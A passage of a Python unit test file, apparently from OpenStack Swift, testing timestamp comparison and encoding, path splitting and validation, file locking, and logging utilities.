self.assertTrue(timestamp > value,
'%r is not greater than %r given %r' % (
timestamp, value, value))
self.assertTrue(timestamp > other,
'%r is not greater than %r given %r' % (
timestamp, other, value))
self.assertTrue(timestamp > other.normal,
'%r is not greater than %r given %r' % (
timestamp, other.normal, value))
self.assertTrue(timestamp > other.internal,
'%r is not greater than %r given %r' % (
timestamp, other.internal, value))
self.assertTrue(timestamp > float(other),
'%r is not greater than %r given %r' % (
timestamp, float(other), value))
self.assertTrue(timestamp > int(other),
'%r is not greater than %r given %r' % (
timestamp, int(other), value))
def test_greater_with_offset(self):
now = time.time()
older = now - 1
test_values = (
0, '0', 0.0, '0.0', '0000.0000', '000.000_000',
1, '1', 1.1, '1.1', '1111.1111', '111.111_111',
1402443346.935174, '1402443346.93517', '1402443346.935169_ffff',
older, '%f' % older, '%f_0000ffff' % older,
now, '%f' % now, '%f_00000000' % now,
)
for offset in range(1, 1000, 100):
timestamp = utils.Timestamp(now, offset=offset)
for value in test_values:
other = utils.Timestamp(value)
self.assertNotEqual(timestamp, other) # sanity
self.assertTrue(timestamp > value,
'%r is not greater than %r given %r' % (
timestamp, value, value))
self.assertTrue(timestamp > other,
'%r is not greater than %r given %r' % (
timestamp, other, value))
self.assertTrue(timestamp > other.normal,
'%r is not greater than %r given %r' % (
timestamp, other.normal, value))
self.assertTrue(timestamp > other.internal,
'%r is not greater than %r given %r' % (
timestamp, other.internal, value))
self.assertTrue(timestamp > float(other),
'%r is not greater than %r given %r' % (
timestamp, float(other), value))
self.assertTrue(timestamp > int(other),
'%r is not greater than %r given %r' % (
timestamp, int(other), value))
def test_smaller_no_offset(self):
now = time.time()
newer = now + 1
timestamp = utils.Timestamp(now)
test_values = (
9999999999.99999, '9999999999.99999', '9999999999.99999_ffff',
newer, '%f' % newer, '%f_0000ffff' % newer,
)
for value in test_values:
other = utils.Timestamp(value)
self.assertNotEqual(timestamp, other) # sanity
self.assertTrue(timestamp < value,
'%r is not smaller than %r given %r' % (
timestamp, value, value))
self.assertTrue(timestamp < other,
'%r is not smaller than %r given %r' % (
timestamp, other, value))
self.assertTrue(timestamp < other.normal,
'%r is not smaller than %r given %r' % (
timestamp, other.normal, value))
self.assertTrue(timestamp < other.internal,
'%r is not smaller than %r given %r' % (
timestamp, other.internal, value))
self.assertTrue(timestamp < float(other),
'%r is not smaller than %r given %r' % (
timestamp, float(other), value))
self.assertTrue(timestamp < int(other),
'%r is not smaller than %r given %r' % (
timestamp, int(other), value))
def test_smaller_with_offset(self):
now = time.time()
newer = now + 1
test_values = (
9999999999.99999, '9999999999.99999', '9999999999.99999_ffff',
newer, '%f' % newer, '%f_0000ffff' % newer,
)
for offset in range(1, 1000, 100):
timestamp = utils.Timestamp(now, offset=offset)
for value in test_values:
other = utils.Timestamp(value)
self.assertNotEqual(timestamp, other) # sanity
self.assertTrue(timestamp < value,
'%r is not smaller than %r given %r' % (
timestamp, value, value))
self.assertTrue(timestamp < other,
'%r is not smaller than %r given %r' % (
timestamp, other, value))
self.assertTrue(timestamp < other.normal,
'%r is not smaller than %r given %r' % (
timestamp, other.normal, value))
self.assertTrue(timestamp < other.internal,
'%r is not smaller than %r given %r' % (
timestamp, other.internal, value))
self.assertTrue(timestamp < float(other),
'%r is not smaller than %r given %r' % (
timestamp, float(other), value))
self.assertTrue(timestamp < int(other),
'%r is not smaller than %r given %r' % (
timestamp, int(other), value))
def test_cmp_with_none(self):
self.assertGreater(utils.Timestamp(0), None)
self.assertGreater(utils.Timestamp(1.0), None)
self.assertGreater(utils.Timestamp(1.0, 42), None)
def test_ordering(self):
given = [
'1402444820.62590_000000000000000a',
'1402444820.62589_0000000000000001',
'1402444821.52589_0000000000000004',
'1402444920.62589_0000000000000004',
'1402444821.62589_000000000000000a',
'1402444821.72589_000000000000000a',
'1402444920.62589_0000000000000002',
'1402444820.62589_0000000000000002',
'1402444820.62589_000000000000000a',
'1402444820.62590_0000000000000004',
'1402444920.62589_000000000000000a',
'1402444820.62590_0000000000000002',
'1402444821.52589_0000000000000002',
'1402444821.52589_0000000000000000',
'1402444920.62589',
'1402444821.62589_0000000000000004',
'1402444821.72589_0000000000000001',
'1402444820.62590',
'1402444820.62590_0000000000000001',
'1402444820.62589_0000000000000004',
'1402444821.72589_0000000000000000',
'1402444821.52589_000000000000000a',
'1402444821.72589_0000000000000004',
'1402444821.62589',
'1402444821.52589_0000000000000001',
'1402444821.62589_0000000000000001',
'1402444821.62589_0000000000000002',
'1402444821.72589_0000000000000002',
'1402444820.62589',
'1402444920.62589_0000000000000001']
expected = [
'1402444820.62589',
'1402444820.62589_0000000000000001',
'1402444820.62589_0000000000000002',
'1402444820.62589_0000000000000004',
'1402444820.62589_000000000000000a',
'1402444820.62590',
'1402444820.62590_0000000000000001',
'1402444820.62590_0000000000000002',
'1402444820.62590_0000000000000004',
'1402444820.62590_000000000000000a',
'1402444821.52589',
'1402444821.52589_0000000000000001',
'1402444821.52589_0000000000000002',
'1402444821.52589_0000000000000004',
'1402444821.52589_000000000000000a',
'1402444821.62589',
'1402444821.62589_0000000000000001',
'1402444821.62589_0000000000000002',
'1402444821.62589_0000000000000004',
'1402444821.62589_000000000000000a',
'1402444821.72589',
'1402444821.72589_0000000000000001',
'1402444821.72589_0000000000000002',
'1402444821.72589_0000000000000004',
'1402444821.72589_000000000000000a',
'1402444920.62589',
'1402444920.62589_0000000000000001',
'1402444920.62589_0000000000000002',
'1402444920.62589_0000000000000004',
'1402444920.62589_000000000000000a',
]
# less visual version
"""
now = time.time()
given = [
utils.Timestamp(now + i, offset=offset).internal
for i in (0, 0.00001, 0.9, 1.0, 1.1, 100.0)
for offset in (0, 1, 2, 4, 10)
]
expected = [t for t in given]
random.shuffle(given)
"""
self.assertEqual(len(given), len(expected)) # sanity
timestamps = [utils.Timestamp(t) for t in given]
# our expected values don't include insignificant offsets
with mock.patch('swift.common.utils.FORCE_INTERNAL', new=False):
self.assertEqual(
[t.internal for t in sorted(timestamps)], expected)
# string sorting works as well
self.assertEqual(
sorted([t.internal for t in timestamps]), expected)
def test_hashable(self):
ts_0 = utils.Timestamp('1402444821.72589')
ts_0_also = utils.Timestamp('1402444821.72589')
self.assertEqual(ts_0, ts_0_also) # sanity
self.assertEqual(hash(ts_0), hash(ts_0_also))
d = {ts_0: 'whatever'}
self.assertIn(ts_0, d) # sanity
self.assertIn(ts_0_also, d)
class TestTimestampEncoding(unittest.TestCase):
def setUp(self):
t0 = utils.Timestamp(0.0)
t1 = utils.Timestamp(997.9996)
t2 = utils.Timestamp(999)
t3 = utils.Timestamp(1000, 24)
t4 = utils.Timestamp(1001)
t5 = utils.Timestamp(1002.00040)
# encodings that are expected when explicit = False
self.non_explicit_encodings = (
('0000001000.00000_18', (t3, t3, t3)),
('0000001000.00000_18', (t3, t3, None)),
)
# mappings that are expected when explicit = True
self.explicit_encodings = (
('0000001000.00000_18+0+0', (t3, t3, t3)),
('0000001000.00000_18+0', (t3, t3, None)),
)
# mappings that are expected when explicit = True or False
self.encodings = (
('0000001000.00000_18+0+186a0', (t3, t3, t4)),
('0000001000.00000_18+186a0+186c8', (t3, t4, t5)),
('0000001000.00000_18-186a0+0', (t3, t2, t2)),
('0000001000.00000_18+0-186a0', (t3, t3, t2)),
('0000001000.00000_18-186a0-186c8', (t3, t2, t1)),
('0000001000.00000_18', (t3, None, None)),
('0000001000.00000_18+186a0', (t3, t4, None)),
('0000001000.00000_18-186a0', (t3, t2, None)),
('0000001000.00000_18', (t3, None, t1)),
('0000001000.00000_18-5f5e100', (t3, t0, None)),
('0000001000.00000_18+0-5f5e100', (t3, t3, t0)),
('0000001000.00000_18-5f5e100+5f45a60', (t3, t0, t2)),
)
# decodings that are expected when explicit = False
self.non_explicit_decodings = (
('0000001000.00000_18', (t3, t3, t3)),
('0000001000.00000_18+186a0', (t3, t4, t4)),
('0000001000.00000_18-186a0', (t3, t2, t2)),
('0000001000.00000_18+186a0', (t3, t4, t4)),
('0000001000.00000_18-186a0', (t3, t2, t2)),
('0000001000.00000_18-5f5e100', (t3, t0, t0)),
)
# decodings that are expected when explicit = True
self.explicit_decodings = (
('0000001000.00000_18+0+0', (t3, t3, t3)),
('0000001000.00000_18+0', (t3, t3, None)),
('0000001000.00000_18', (t3, None, None)),
('0000001000.00000_18+186a0', (t3, t4, None)),
('0000001000.00000_18-186a0', (t3, t2, None)),
('0000001000.00000_18-5f5e100', (t3, t0, None)),
)
# decodings that are expected when explicit = True or False
self.decodings = (
('0000001000.00000_18+0+186a0', (t3, t3, t4)),
('0000001000.00000_18+186a0+186c8', (t3, t4, t5)),
('0000001000.00000_18-186a0+0', (t3, t2, t2)),
('0000001000.00000_18+0-186a0', (t3, t3, t2)),
('0000001000.00000_18-186a0-186c8', (t3, t2, t1)),
('0000001000.00000_18-5f5e100+5f45a60', (t3, t0, t2)),
)
def _assertEqual(self, expected, actual, test):
self.assertEqual(expected, actual,
'Got %s but expected %s for parameters %s'
% (actual, expected, test))
def test_encoding(self):
for test in self.explicit_encodings:
actual = utils.encode_timestamps(test[1][0], test[1][1],
test[1][2], True)
self._assertEqual(test[0], actual, test[1])
for test in self.non_explicit_encodings:
actual = utils.encode_timestamps(test[1][0], test[1][1],
test[1][2], False)
self._assertEqual(test[0], actual, test[1])
for explicit in (True, False):
for test in self.encodings:
actual = utils.encode_timestamps(test[1][0], test[1][1],
test[1][2], explicit)
self._assertEqual(test[0], actual, test[1])
def test_decoding(self):
for test in self.explicit_decodings:
actual = utils.decode_timestamps(test[0], True)
self._assertEqual(test[1], actual, test[0])
for test in self.non_explicit_decodings:
actual = utils.decode_timestamps(test[0], False)
self._assertEqual(test[1], actual, test[0])
for explicit in (True, False):
for test in self.decodings:
actual = utils.decode_timestamps(test[0], explicit)
self._assertEqual(test[1], actual, test[0])
class TestUtils(unittest.TestCase):
"""Tests for swift.common.utils """
def setUp(self):
utils.HASH_PATH_SUFFIX = 'endcap'
utils.HASH_PATH_PREFIX = 'startcap'
def test_lock_path(self):
tmpdir = mkdtemp()
try:
with utils.lock_path(tmpdir, 0.1):
exc = None
success = False
try:
with utils.lock_path(tmpdir, 0.1):
success = True
except LockTimeout as err:
exc = err
self.assertTrue(exc is not None)
self.assertTrue(not success)
finally:
shutil.rmtree(tmpdir)
def test_lock_path_num_sleeps(self):
tmpdir = mkdtemp()
num_short_calls = [0]
exception_raised = [False]
def my_sleep(to_sleep):
if to_sleep == 0.01:
num_short_calls[0] += 1
else:
raise Exception('sleep time changed: %s' % to_sleep)
try:
with mock.patch('swift.common.utils.sleep', my_sleep):
with utils.lock_path(tmpdir):
with utils.lock_path(tmpdir):
pass
except Exception as e:
exception_raised[0] = True
self.assertTrue('sleep time changed' in str(e))
finally:
shutil.rmtree(tmpdir)
self.assertEqual(num_short_calls[0], 11)
self.assertTrue(exception_raised[0])
def test_lock_path_class(self):
tmpdir = mkdtemp()
try:
with utils.lock_path(tmpdir, 0.1, ReplicationLockTimeout):
exc = None
exc2 = None
success = False
try:
with utils.lock_path(tmpdir, 0.1, ReplicationLockTimeout):
success = True
except ReplicationLockTimeout as err:
exc = err
except LockTimeout as err:
exc2 = err
self.assertTrue(exc is not None)
self.assertTrue(exc2 is None)
self.assertTrue(not success)
exc = None
exc2 = None
success = False
try:
with utils.lock_path(tmpdir, 0.1):
success = True
except ReplicationLockTimeout as err:
exc = err
except LockTimeout as err:
exc2 = err
self.assertTrue(exc is None)
self.assertTrue(exc2 is not None)
self.assertTrue(not success)
finally:
shutil.rmtree(tmpdir)
def test_normalize_timestamp(self):
# Test swift.common.utils.normalize_timestamp
self.assertEqual(utils.normalize_timestamp('1253327593.48174'),
"1253327593.48174")
self.assertEqual(utils.normalize_timestamp(1253327593.48174),
"1253327593.48174")
self.assertEqual(utils.normalize_timestamp('1253327593.48'),
"1253327593.48000")
self.assertEqual(utils.normalize_timestamp(1253327593.48),
"1253327593.48000")
self.assertEqual(utils.normalize_timestamp('253327593.48'),
"0253327593.48000")
self.assertEqual(utils.normalize_timestamp(253327593.48),
"0253327593.48000")
self.assertEqual(utils.normalize_timestamp('1253327593'),
"1253327593.00000")
self.assertEqual(utils.normalize_timestamp(1253327593),
"1253327593.00000")
self.assertRaises(ValueError, utils.normalize_timestamp, '')
self.assertRaises(ValueError, utils.normalize_timestamp, 'abc')
def test_normalize_delete_at_timestamp(self):
self.assertEqual(
utils.normalize_delete_at_timestamp(1253327593),
'1253327593')
self.assertEqual(
utils.normalize_delete_at_timestamp(1253327593.67890),
'1253327593')
self.assertEqual(
utils.normalize_delete_at_timestamp('1253327593'),
'1253327593')
self.assertEqual(
utils.normalize_delete_at_timestamp('1253327593.67890'),
'1253327593')
self.assertEqual(
utils.normalize_delete_at_timestamp(-1253327593),
'0000000000')
self.assertEqual(
utils.normalize_delete_at_timestamp(-1253327593.67890),
'0000000000')
self.assertEqual(
utils.normalize_delete_at_timestamp('-1253327593'),
'0000000000')
self.assertEqual(
utils.normalize_delete_at_timestamp('-1253327593.67890'),
'0000000000')
self.assertEqual(
utils.normalize_delete_at_timestamp(71253327593),
'9999999999')
self.assertEqual(
utils.normalize_delete_at_timestamp(71253327593.67890),
'9999999999')
self.assertEqual(
utils.normalize_delete_at_timestamp('71253327593'),
'9999999999')
self.assertEqual(
utils.normalize_delete_at_timestamp('71253327593.67890'),
'9999999999')
self.assertRaises(ValueError, utils.normalize_timestamp, '')
self.assertRaises(ValueError, utils.normalize_timestamp, 'abc')
def test_last_modified_date_to_timestamp(self):
expectations = {
'1970-01-01T00:00:00.000000': 0.0,
'2014-02-28T23:22:36.698390': 1393629756.698390,
'2011-03-19T04:03:00.604554': 1300507380.604554,
}
for last_modified, ts in expectations.items():
real = utils.last_modified_date_to_timestamp(last_modified)
self.assertEqual(real, ts, "failed for %s" % last_modified)
def test_last_modified_date_to_timestamp_when_system_not_UTC(self):
try:
old_tz = os.environ.get('TZ')
# Western Argentina Summer Time. Found in glibc manual; this
# timezone always has a non-zero offset from UTC, so this test is
# always meaningful.
os.environ['TZ'] = 'WART4WARST,J1/0,J365/25'
self.assertEqual(utils.last_modified_date_to_timestamp(
'1970-01-01T00:00:00.000000'),
0.0)
finally:
if old_tz is not None:
os.environ['TZ'] = old_tz
else:
os.environ.pop('TZ')
def test_backwards(self):
# Test swift.common.utils.backward
# The lines are designed so that the function would encounter
# all of the boundary conditions and typical conditions.
# Block boundaries are marked with '<>' characters
blocksize = 25
lines = [b'123456789x12345678><123456789\n', # block larger than rest
b'123456789x123>\n', # block ends just before \n character
b'123423456789\n',
b'123456789x\n', # block ends at the end of line
b'<123456789x123456789x123\n',
b'<6789x123\n', # block ends at the beginning of the line
b'6789x1234\n',
b'1234><234\n', # block ends typically in the middle of line
b'123456789x123456789\n']
with TemporaryFile() as f:
for line in lines:
f.write(line)
count = len(lines) - 1
for line in utils.backward(f, blocksize):
self.assertEqual(line, lines[count].split(b'\n')[0])
count -= 1
# Empty file case
with TemporaryFile('r') as f:
self.assertEqual([], list(utils.backward(f)))
def test_mkdirs(self):
testdir_base = mkdtemp()
testroot = os.path.join(testdir_base, 'mkdirs')
try:
self.assertTrue(not os.path.exists(testroot))
utils.mkdirs(testroot)
self.assertTrue(os.path.exists(testroot))
utils.mkdirs(testroot)
self.assertTrue(os.path.exists(testroot))
rmtree(testroot, ignore_errors=1)
testdir = os.path.join(testroot, 'one/two/three')
self.assertTrue(not os.path.exists(testdir))
utils.mkdirs(testdir)
self.assertTrue(os.path.exists(testdir))
utils.mkdirs(testdir)
self.assertTrue(os.path.exists(testdir))
rmtree(testroot, ignore_errors=1)
open(testroot, 'wb').close()
self.assertTrue(not os.path.exists(testdir))
self.assertRaises(OSError, utils.mkdirs, testdir)
os.unlink(testroot)
finally:
rmtree(testdir_base)
def test_split_path(self):
# Test swift.common.utils.split_account_path
self.assertRaises(ValueError, utils.split_path, '')
self.assertRaises(ValueError, utils.split_path, '/')
self.assertRaises(ValueError, utils.split_path, '//')
self.assertEqual(utils.split_path('/a'), ['a'])
self.assertRaises(ValueError, utils.split_path, '//a')
self.assertEqual(utils.split_path('/a/'), ['a'])
self.assertRaises(ValueError, utils.split_path, '/a/c')
self.assertRaises(ValueError, utils.split_path, '//c')
self.assertRaises(ValueError, utils.split_path, '/a/c/')
self.assertRaises(ValueError, utils.split_path, '/a//')
self.assertRaises(ValueError, utils.split_path, '/a', 2)
self.assertRaises(ValueError, utils.split_path, '/a', 2, 3)
self.assertRaises(ValueError, utils.split_path, '/a', 2, 3, True)
self.assertEqual(utils.split_path('/a/c', 2), ['a', 'c'])
self.assertEqual(utils.split_path('/a/c/o', 3), ['a', 'c', 'o'])
self.assertRaises(ValueError, utils.split_path, '/a/c/o/r', 3, 3)
self.assertEqual(utils.split_path('/a/c/o/r', 3, 3, True),
['a', 'c', 'o/r'])
self.assertEqual(utils.split_path('/a/c', 2, 3, True),
['a', 'c', None])
self.assertRaises(ValueError, utils.split_path, '/a', 5, 4)
self.assertEqual(utils.split_path('/a/c/', 2), ['a', 'c'])
self.assertEqual(utils.split_path('/a/c/', 2, 3), ['a', 'c', ''])
try:
utils.split_path('o\nn e', 2)
except ValueError as err:
self.assertEqual(str(err), 'Invalid path: o%0An%20e')
try:
utils.split_path('o\nn e', 2, 3, True)
except ValueError as err:
self.assertEqual(str(err), 'Invalid path: o%0An%20e')
def test_validate_device_partition(self):
# Test swift.common.utils.validate_device_partition
utils.validate_device_partition('foo', 'bar')
self.assertRaises(ValueError,
utils.validate_device_partition, '', '')
self.assertRaises(ValueError,
utils.validate_device_partition, '', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', '')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo/bar', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', 'foo/bar')
self.assertRaises(ValueError,
utils.validate_device_partition, '.', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, '..', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', '.')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', '..')
try:
utils.validate_device_partition('o\nn e', 'foo')
except ValueError as err:
self.assertEqual(str(err), 'Invalid device: o%0An%20e')
try:
utils.validate_device_partition('foo', 'o\nn e')
except ValueError as err:
self.assertEqual(str(err), 'Invalid partition: o%0An%20e')
def test_NullLogger(self):
# Test swift.common.utils.NullLogger
sio = StringIO()
nl = utils.NullLogger()
nl.write('test')
self.assertEqual(sio.getvalue(), '')
def test_LoggerFileObject(self):
orig_stdout = sys.stdout
orig_stderr = sys.stderr
sio = StringIO()
handler = logging.StreamHandler(sio)
logger = logging.getLogger()
logger.addHandler(handler)
lfo_stdout = utils.LoggerFileObject(logger)
lfo_stderr = utils.LoggerFileObject(logger)
lfo_stderr = utils.LoggerFileObject(logger, 'STDERR')
print('test1')
self.assertEqual(sio.getvalue(), '')
sys.stdout = lfo_stdout
print('test2')
self.assertEqual(sio.getvalue(), 'STDOUT: test2\n')
sys.stderr = lfo_stderr
print('test4', file=sys.stderr)
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n')
sys.stdout = orig_stdout
print('test5')
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n')
print('test6', file=sys.stderr)
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n'
'STDERR: test6\n')
sys.stderr = orig_stderr
print('test8')
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n'
'STDERR: test6\n')
lfo_stdout.writelines(['a', 'b', 'c'])
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n'
'STDERR: test6\nSTDOUT: a#012b#012c\n')
lfo_stdout.close()
lfo_stderr.close()
lfo_stdout.write('d')
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n'
'STDERR: test6\nSTDOUT: a#012b#012c\nSTDOUT: d\n')
lfo_stdout.flush()
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n'
'STDERR: test6\nSTDOUT: a#012b#012c\nSTDOUT: d\n')
for lfo in (lfo_stdout, lfo_stderr):
got_exc = False
try:
for line in lfo:
pass
except Exception:
got_exc = True
self.assertTrue(got_exc)
got_exc = False
try:
for line in lfo:
pass
except Exception:
got_exc = True
self.assertTrue(got_exc)
self.assertRaises(IOError, lfo.read)
self.assertRaises(IOError, lfo.read, 1024)
self.assertRaises(IOError, lfo.readline)
self.assertRaises(IOError, lfo.readline, 1024)
lfo.tell()
def test_parse_options(self):
# Get a file that is definitely on disk
with NamedTemporaryFile() as f:
conf_file = f.name
conf, options = utils.parse_options(test_args=[conf_file])
self.assertEqual(conf, conf_file)
# assert defaults
self.assertEqual(options['verbose'], False)
self.assertTrue('once' not in options)
# assert verbose as option
conf, options = utils.parse_options(test_args=[conf_file, '-v'])
self.assertEqual(options['verbose'], True)
# check once option
conf, options = utils.parse_options(test_args=[conf_file],
once=True)
self.assertEqual(options['once'], False)
test_args = [conf_file, '--once']
conf, options = utils.parse_options(test_args=test_args, once=True)
self.assertEqual(options['once'], True)
# check options as arg parsing
test_args = [conf_file, 'once', 'plugin_name', 'verbose']
conf, options = utils.parse_options(test_args=test_args, once=True)
self.assertEqual(options['verbose'], True)
self.assertEqual(options['once'], True)
self.assertEqual(options['extra_args'], ['plugin_name'])
def test_parse_options_errors(self):
orig_stdout = sys.stdout
orig_stderr = sys.stderr
stdo = StringIO()
stde = StringIO()
utils.sys.stdout = stdo
utils.sys.stderr = stde
self.assertRaises(SystemExit, utils.parse_options, once=True,
test_args=[])
self.assertTrue('missing config' in stdo.getvalue())
# verify conf file must exist, context manager will delete temp file
with NamedTemporaryFile() as f:
conf_file = f.name
self.assertRaises(SystemExit, utils.parse_options, once=True,
test_args=[conf_file])
self.assertTrue('unable to locate' in stdo.getvalue())
# reset stdio
utils.sys.stdout = orig_stdout
utils.sys.stderr = orig_stderr
def test_dump_recon_cache(self):
testdir_base = mkdtemp()
testcache_file = os.path.join(testdir_base, 'cache.recon')
logger = utils.get_logger(None, 'server', log_route='server')
try:
submit_dict = {'key1': {'value1': 1, 'value2': 2}}
utils.dump_recon_cache(submit_dict, testcache_file, logger)
fd = open(testcache_file)
file_dict = json.loads(fd.readline())
fd.close()
self.assertEqual(submit_dict, file_dict)
# Use a nested entry
submit_dict = {'key1': {'key2': {'value1': 1, 'value2': 2}}}
result_dict = {'key1': {'key2': {'value1': 1, 'value2': 2},
'value1': 1, 'value2': 2}}
utils.dump_recon_cache(submit_dict, testcache_file, logger)
fd = open(testcache_file)
file_dict = json.loads(fd.readline())
fd.close()
self.assertEqual(result_dict, file_dict)
finally:
rmtree(testdir_base)
def test_dump_recon_cache_permission_denied(self):
testdir_base = mkdtemp()
testcache_file = os.path.join(testdir_base, 'cache.recon')
class MockLogger(object):
def __init__(self):
self._excs = []
def exception(self, message):
_junk, exc, _junk = sys.exc_info()
self._excs.append(exc)
logger = MockLogger()
try:
submit_dict = {'key1': {'value1': 1, 'value2': 2}}
with mock.patch(
'swift.common.utils.NamedTemporaryFile',
side_effect=IOError(13, 'Permission Denied')):
utils.dump_recon_cache(submit_dict, testcache_file, logger)
self.assertIsInstance(logger._excs[0], IOError)
finally:
rmtree(testdir_base)
def test_get_logger(self):
sio = StringIO()
logger = logging.getLogger('server')
logger.addHandler(logging.StreamHandler(sio))
logger = utils.get_logger(None, 'server', log_route='server')
logger.warning('test1')
self.assertEqual(sio.getvalue(), 'test1\n')
logger.debug('test2')
self.assertEqual(sio.getvalue(), 'test1\n')
logger = utils.get_logger({'log_level': 'DEBUG'}, 'server',
log_route='server')
logger.debug('test3')
self.assertEqual(sio.getvalue(), 'test1\ntest3\n')
# Doesn't really test that the log facility is truly being used all the
# way to syslog; but exercises the code.
logger = utils.get_logger({'log_facility': 'LOG_LOCAL3'}, 'server',
log_route='server')
logger.warning('test4')
self.assertEqual(sio.getvalue(),
'test1\ntest3\ntest4\n')
# make sure debug doesn't log by default
logger.debug('test5')
self.assertEqual(sio.getvalue(),
'test1\ntest3\ntest4\n')
# make sure notice lvl logs by default
logger.notice('test6')
self.assertEqual(sio.getvalue(),
'test1\ntest3\ntest4\ntest6\n')
def test_get_logger_sysloghandler_plumbing(self):
orig_sysloghandler = utils.SysLogHandler
syslog_handler_args = []
def syslog_handler_catcher(*args, **kwargs):
syslog_handler_args.append((args, kwargs))
return orig_sysloghandler(*args, **kwargs)
syslog_handler_catcher.LOG_LOCAL0 = orig_sysloghandler.LOG_LOCAL0
syslog_handler_catcher.LOG_LOCAL3 = orig_sysloghandler.LOG_LOCAL3
try:
utils.SysLogHandler = syslog_handler_catcher
utils.get_logger({
'log_facility': 'LOG_LOCAL3',
}, 'server', log_route='server')
expected_args = [((), {'address': '/dev/log',
'facility': orig_sysloghandler.LOG_LOCAL3})]
if not os.path.exists('/dev/log') or \
os.path.isfile('/dev/log') or \
os.path.isdir('/dev/log'):
# Since socket on OSX is in /var/run/syslog, there will be
# a fallback to UDP.
expected_args.append(
((), {'facility': orig_sysloghandler.LOG_LOCAL3}))
self.assertEqual(expected_args, syslog_handler_args)
syslog_handler_args = []
utils.get_logger({
'log_facility': 'LOG_LOCAL3',
'log_address': '/foo/bar',
}, 'server', log_route='server')
self.assertEqual([
((), {'address': '/foo/bar',
'facility': orig_sysloghandler.LOG_LOCAL3}),
# Second call is because /foo/bar didn't exist (and wasn't a
# UNIX domain socket).
((), {'facility': orig_sysloghandler.LOG_LOCAL3})],
syslog_handler_args)
# Using UDP with default port
syslog_handler_args = []
utils.get_logger({
'log_udp_host': 'syslog.funtimes.com',
}, 'server', log_route='server')
self.assertEqual([
((), {'address': ('syslog.funtimes.com',
logging.handlers.SYSLOG_UDP_PORT),
'facility': orig_sysloghandler.LOG_LOCAL0})],
syslog_handler_args)
# Using UDP with non-default port
syslog_handler_args = []
utils.get_logger({
'log_udp_host': 'syslog.funtimes.com',
'log_udp_port': '2123',
}, 'server', log_route='server')
self.assertEqual([
((), {'address': ('syslog.funtimes.com', 2123),
'facility': orig_sysloghandler.LOG_LOCAL0})],
syslog_handler_args)
finally:
utils.SysLogHandler = orig_sysloghandler
@reset_logger_state
def test_clean_logger_exception(self):
# setup stream logging
sio = StringIO()
logger = utils.get_logger(None)
handler = logging.StreamHandler(sio)
logger.logger.addHandler(handler)
def strip_value(sio):
sio.seek(0)
v = sio.getvalue()
sio.truncate(0)
return v
def log_exception(exc):
try:
raise exc
except (Exception, Timeout):
logger.exception('blah')
try:
# establish base case
self.assertEqual(strip_value(sio), '')
logger.info('test')
self.assertEqual(strip_value(sio), 'test\n')
self.assertEqual(strip_value(sio), '')
logger.info('test')
logger.info('test')
self.assertEqual(strip_value(sio), 'test\ntest\n')
self.assertEqual(strip_value(sio), '')
# test OSError
for en in (errno.EIO, errno.ENOSPC):
log_exception(OSError(en, 'my %s error message' % en))
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('my %s error message' % en in log_msg)
# unfiltered
log_exception(OSError())
self.assertTrue('Traceback' in strip_value(sio))
# test socket.error
log_exception(socket.error(errno.ECONNREFUSED,
'my error message'))
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('errno.ECONNREFUSED message test' not in log_msg)
self.assertTrue('Connection refused' in log_msg)
log_exception(socket.error(errno.EHOSTUNREACH,
'my error message'))
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('my error message' not in log_msg)
self.assertTrue('Host unreachable' in log_msg)
log_exception(socket.error(errno.ETIMEDOUT, 'my error message'))
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('my error message' not in log_msg)
self.assertTrue('Connection timeout' in log_msg)
# unfiltered
log_exception(socket.error(0, 'my error message'))
log_msg = strip_value(sio)
self.assertTrue('Traceback' in log_msg)
self.assertTrue('my error message' in log_msg)
# test eventlet.Timeout
connection_timeout = ConnectionTimeout(42, 'my error message')
log_exception(connection_timeout)
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('ConnectionTimeout' in log_msg)
self.assertTrue('(42s)' in log_msg)
self.assertTrue('my error message' not in log_msg)
connection_timeout.cancel()
message_timeout = MessageTimeout(42, 'my error message')
log_exception(message_timeout)
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('MessageTimeout' in log_msg)
self.assertTrue('(42s)' in log_msg)
self.assertTrue('my error message' in log_msg)
message_timeout.cancel()
# test unhandled
log_exception(Exception('my error message'))
log_msg = strip_value(sio)
self.assertTrue('Traceback' in log_msg)
self.assertTrue('my error message' in log_msg)
finally:
logger.logger.removeHandler(handler)
@reset_logger_state
def test_swift_log_formatter_max_line_length(self):
# setup stream logging
sio = StringIO()
logger = utils.get_logger(None)
handler = logging.StreamHandler(sio)
formatter = utils.SwiftLogFormatter(max_line_length=10)
handler.setFormatter(formatter)
logger.logger.addHandler(handler)
def strip_value(sio):
sio.seek(0)
v = sio.getvalue()
sio.truncate(0)
return v
try:
logger.info('12345')
self.assertEqual(strip_value(sio), '12345\n')
logger.info('1234567890')
self.assertEqual(strip_value(sio), '1234567890\n')
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '12 ... de\n')
formatter.max_line_length = 11
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '123 ... cde\n')
formatter.max_line_length = 0
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '1234567890abcde\n')
formatter.max_line_length = 1
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '1\n')
formatter.max_line_length = 2
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '12\n')
formatter.max_line_length = 3
logger.info('1234567890abcde')
